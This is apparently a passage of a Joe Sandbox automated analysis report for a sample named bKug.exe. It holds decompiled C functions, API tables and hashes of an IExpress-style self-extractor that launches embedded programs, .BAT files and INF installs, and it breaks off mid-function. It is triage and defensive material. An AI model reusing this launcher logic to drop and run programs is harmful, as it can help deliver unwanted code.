0x0007657c
0x00076536
0x0007653e
0x00076542
0x00000000
0x00076544
0x00076547
0x0007654c
0x00076549
0x00076549
0x00076549
0x0007655e
0x00076560
0x00076569
0x00000000
0x00000000
0x00076569
0x00076542
0x00076587

APIs

FindResourceA.KERNEL32(00070000,000007D6,00000005), ref: 0007652A
LoadResource.KERNEL32(00070000,00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00076538
DialogBoxIndirectParamA.USER32(00070000,00000000,00000547,000719E0,00000000), ref: 00076557
FreeResource.KERNEL32(00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00076560

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: f5dd381d4017a2af6f1c16f9dea88675a8421d206011a3fcc15d5eccab0e0395
Instruction ID: 13334234b95325a01605899ff26ca7c4f4e961bd3a46ece5303bee0f460a9e82
Opcode Fuzzy Hash: f5dd381d4017a2af6f1c16f9dea88675a8421d206011a3fcc15d5eccab0e0395
Instruction Fuzzy Hash: 5C012B72A00905BBEB105F599C08DBF7AACEBC6761F044115FE09A3150D77ECC50D6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00073680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00073680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0007368c
0x0007368f
0x00073691
0x0007369f
0x000736a7
0x00000000
0x00000000
0x000736ba
0x00000000
0x000736bc
0x000736bc
0x000736c0
0x000736cb
0x000736c2
0x000736c4
0x000736c4
0x000736da
0x000736e0
0x000736e6
0x00000000
0x00000000
0x000736e6
0x00000000
0x000736ba
0x000736ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0007369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000736B2
DispatchMessageA.USER32(?), ref: 000736CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000736DA

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 37899d1703ee66beba513cd3a239e7adf8e5b7577c3697034c0c254e821c1cf3
Instruction ID: 9993843c4386ad18ed490067c87e65c45e6da2a5300e3386c01787b2f0cc9e6b
Opcode Fuzzy Hash: 37899d1703ee66beba513cd3a239e7adf8e5b7577c3697034c0c254e821c1cf3
Instruction Fuzzy Hash: 15018472E402547BFB304AA65C48EEF76BCEBC6B11F10811DB909E2180D5689640D674

Uniqueness

Uniqueness Score: -1.00%

Function 000765E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E000765E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x000765e8
0x000765ed
0x000765ef
0x000765f2
0x000765f4
0x000765f4
0x000765f6
0x000765f7
0x00076608
0x00076611
0x00076618
0x0007661c
0x00000000
0x00000000
0x0007660e
0x00076623
0x00076625
0x0007663b
0x0007663b
0x0007663d
0x00076641
0x00076610
0x00076610
0x00000000
0x00076610
0x00076644
0x00076647
0x00076647
0x00076621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00072B33), ref: 00076602
CharPrevA.USER32(?,00000000), ref: 00076612
CharPrevA.USER32(?,00000000), ref: 00076629
CharNextA.USER32(00000000), ref: 00076635

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 5ba0d406f0c6ac42f312783d455f0d55fa55d63fd52fcf5c720274e10a0f2870
Instruction ID: 8d4e4dfe46934184f40102c97e2ab35356cc6b1fb1f686d56c01fed348634176
Opcode Fuzzy Hash: 5ba0d406f0c6ac42f312783d455f0d55fa55d63fd52fcf5c720274e10a0f2870
Instruction Fuzzy Hash: 36F04931D048406EF7320B398C888BBAFDCCBC7255B59417FE88F92000D61E0D468665

Uniqueness

Uniqueness Score: -1.00%

Function 000769B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000769B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x781f8 = E00076C70();
				__set_app_type(E00076FBE(2));
				 *0x788a4 =  *0x788a4 | 0xffffffff;
				 *0x788a8 =  *0x788a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x78528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x7851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00077000();
				if( *0x78000 == 0) {
					__setusermatherr(E00077000);
				}
				E000771EF(_t6);
				return 0;
			}

0x000769b7
0x000769c2
0x000769c8
0x000769cf
0x000769d8
0x000769de
0x000769e4
0x000769e6
0x000769ec
0x000769f2
0x000769f4
0x00076a00
0x00076a07
0x00076a0d
0x00076a0e
0x00076a15

APIs

Part of subcall function 00076FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00076FC5

__set_app_type.MSVCRT ref: 000769C2
__p__fmode.MSVCRT ref: 000769D8
__p__commode.MSVCRT ref: 000769E6
__setusermatherr.MSVCRT ref: 00076A07

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 88ef6cbd1883a18f57c7f400eab25a582aaf2aa2fe493c2989759d0c850b908f
Instruction ID: 2a8a1b85ed346d95ef9fe2cf5849a885a54273e8f050acb68e1873cbd46b37b8
Opcode Fuzzy Hash: 88ef6cbd1883a18f57c7f400eab25a582aaf2aa2fe493c2989759d0c850b908f
Instruction Fuzzy Hash: 8CF0DA70D487018FE6586B34AD0E6083B61B745321B10C619E45EA62E2CF3E8581CB16

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: bKug.exePID: 2188, Parent PID: 4604COMMON

Execution Graph

Execution Coverage:	26.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	968
Total number of Limit Nodes:	41

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01083BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01083BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x1089124 =  *0x1089124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x1088a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x1088c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0108468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E010844B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x1089124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E01081AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E01086CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E01083FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x1088580;
													if( *0x1088580 != 0) {
														E01082267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x1088180;
											if( *0x1088180 == 0) {
												_t146 = 0x4c7;
												E010844B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x1089124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x1089a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E01086495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E010844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x1089124 = E01086285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E010844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x1088a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x1089a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x1088a38 & 0x0000ffff;
											_v380 = 0x1089154;
											_v376 = _t151;
											_v372 = 0x10891e4;
											_v360 = _t97;
											if( *0x1088a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x1089a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x1088d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x1089a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x108a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x1089124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x1089a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x1088a20;
										if( *0x1088a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0108202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0108468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x1088c42;
									if( *0x1088c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x1088a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0108468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0108468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E01081781( &_v276, 0x104, _t130, 0x1088c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0108468F(_t130, 0x1089a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x01083baa
0x01083bb0
0x01083bb7
0x01083bc0
0x01083bc2
0x01083bc9
0x01083bcb
0x01083bcf
0x01083bd3
0x01083bd9
0x01083bfd
0x01083bfd
0x01083bff
0x01083c03
0x01083c03
0x01083c11
0x01083c16
0x01083c19
0x01083c28
0x00000000
0x00000000
0x01083c30
0x01083c39
0x01083c40
0x01083d13
0x01083d15
0x01083d21
0x01083d26
0x00000000
0x01083c4f
0x01083c56
0x01083c60
0x01083c65
0x01083c77
0x01083c78
0x01083c7c
0x01083c7e
0x01083c82
0x01083c82
0x00000000
0x01083c7c
0x01083c67
0x01083c69
0x01083c6d
0x00000000
0x01083c58
0x01083c58
0x01083c6e
0x01083c6e
0x01083c87
0x01083c89
0x01083d4d
0x01083d4f
0x01083d50
0x01083d52
0x01083d9e
0x01083da8
0x01083daf
0x01083db4
0x01083db6
0x01083f4d
0x01083f4d
0x01083f4f
0x01083f56
0x01083f57
0x01083f58
0x01083f63
0x01083f63
0x01083dbc
0x01083dc0
0x01083dc2
0x01083de6
0x01083de6
0x01083de8
0x01083f0b
0x01083f0b
0x01083f0f
0x01083f13
0x01083f15
0x01083f1a
0x01083f1c
0x01083f46
0x01083f47
0x00000000
0x01083f47
0x01083f1e
0x01083f1f
0x01083f25
0x01083f26
0x01083f2a
0x01083f2d
0x01083fd9
0x01083fd9
0x01083fda
0x01083fda
0x01083fe1
0x01083fe3
0x01083fe3
0x01083fe8
0x00000000
0x01083fe8
0x01083f33
0x01083f37
0x00000000
0x01083f37
0x01083dee
0x01083dee
0x01083df5
0x01083fad
0x01083fb9
0x01083fc2
0x01083fc8
0x00000000
0x01083fc8
0x01083dfb
0x01083dfd
0x00000000
0x00000000
0x01083e03
0x01083e0a
0x00000000
0x00000000
0x01083e15
0x01083e17
0x01083e19
0x01083f94
0x01083fa4
0x01083f7c
0x01083f80
0x01083f8b
0x00000000
0x01083f8b
0x01083e2c
0x01083e30
0x01083e34
0x01083e36
0x01083f69
0x01083f6e
0x01083f70
0x01083f76
0x00000000
0x01083f76
0x01083e3c
0x01083e43
0x01083e47
0x01083e52
0x01083e56
0x01083e5c
0x01083e61
0x01083e68
0x01083e70
0x01083e74
0x01083e7c
0x01083e80
0x01083e82
0x01083e82
0x01083e87
0x01083e87
0x01083e8b
0x01083e91
0x01083e94
0x01083e96
0x01083e96
0x01083e9b
0x01083e9b
0x01083e9f
0x01083ea2
0x01083ea4
0x01083ea4
0x01083ea9
0x01083ea9
0x01083ead
0x01083eb3
0x01083eb6
0x01083eb8
0x01083eb8
0x01083ebd
0x01083ebd
0x01083ec1
0x01083ec3
0x01083ec5
0x01083ec5
0x01083eca
0x01083eca
0x01083ece
0x01083ed5
0x01083ed9
0x01083ee0
0x01083ee6
0x01083eea
0x01083eec
0x01083eee
0x01083ef3
0x01083ef3
0x01083ef5
0x01083efa
0x01083efb
0x01083efd
0x01083f40
0x00000000
0x01083eff
0x01083eff
0x01083f05
0x00000000
0x01083f05
0x01083efd
0x01083dc7
0x01083dce
0x00000000
0x00000000
0x01083dd0
0x01083dd7
0x00000000
0x00000000
0x01083dd9
0x01083ddb
0x00000000
0x00000000
0x01083ddd
0x01083de1
0x00000000
0x01083de1
0x01083d59
0x01083d65
0x01083d6a
0x01083d6c
0x00000000
0x00000000
0x01083d6e
0x01083d75
0x00000000
0x00000000
0x01083d8f
0x01083d96
0x01083d98
0x00000000
0x00000000
0x00000000
0x01083d98
0x01083c8f
0x01083c98
0x01083cf1
0x01083cf3
0x00000000
0x00000000
0x01083cfe
0x01083d11
0x00000000
0x00000000
0x00000000
0x01083d11
0x01083c9c
0x01083ca5
0x01083ca7
0x00000000
0x00000000
0x01083cad
0x01083cb2
0x01083cb7
0x01083cc5
0x00000000
0x00000000
0x01083ce8
0x01083cec
0x01083ced
0x01083ced
0x00000000
0x01083ce8
0x01083c9e
0x00000000
0x01083c9e
0x01083c56
0x01083d35
0x01083d35
0x01083d3c
0x01083d48
0x00000000
0x01083d48
0x01083c03
0x01083be2
0x01083be7
0x01083bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 01083C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 01083CDC

Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846A0
Part of subcall function 0108468F: SizeofResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846A9
Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846C3
Part of subcall function 0108468F: LoadResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846CC
Part of subcall function 0108468F: LockResource.KERNEL32(00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846D3
Part of subcall function 0108468F: memcpy_s.MSVCRT ref: 010846E5
Part of subcall function 0108468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010846EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,01088C42), ref: 01083D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 01083E26
FreeLibrary.KERNEL32(00000000,?,01088C42), ref: 01083EFF
LocalFree.KERNEL32(?,?,?,?,01088C42), ref: 01083F1F
FreeLibrary.KERNEL32(00000000,?,01088C42), ref: 01083F40
LocalFree.KERNEL32(?,?,?,?,01088C42), ref: 01083F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,01088C42), ref: 01083F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,01088C42), ref: 01083F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,01088C42), ref: 01083FC2

Strings

REBOOT, xrefs: 01083BE2
SHOWWINDOW, xrefs: 01083C34
ADMQCMD, xrefs: 01083C9E
USRQCMD, xrefs: 01083CAD
advpack.dll, xrefs: 01083F9D
D, xrefs: 01083C19
DoInfInstall, xrefs: 01083E1F, 01083E24, 01083F68
RUNPROGRAM, xrefs: 01083D05
<None>, xrefs: 01083CC9, 01083D7D
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01083E74
POSTRUNPROGRAM, xrefs: 01083D60
lenta, xrefs: 01083E68

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
API String ID: 1032054927-1718037804
Opcode ID: 2a87baa2e4e2a92e3a0c0bb00406b86d4404ea50e8ffc7c6b7d2ac56a2a89864
Instruction ID: e47aa4f3dc10f835fbd4643500ba0a1832a0aed93a44777b380df0a5c3541dba
Opcode Fuzzy Hash: 2a87baa2e4e2a92e3a0c0bb00406b86d4404ea50e8ffc7c6b7d2ac56a2a89864
Instruction Fuzzy Hash: BFB19F7060C3019BE770BF289845B6FBAE4BBC4B14F00496EFAC5DA181DB79C845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 01081AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01081AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E01081680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E01081A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E01081781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
					E0108658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E01081680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E010866C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E010866C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E01081680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E01081781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E010816B3( &_v1552, 0x400, " ");
										E010816B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E01082AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
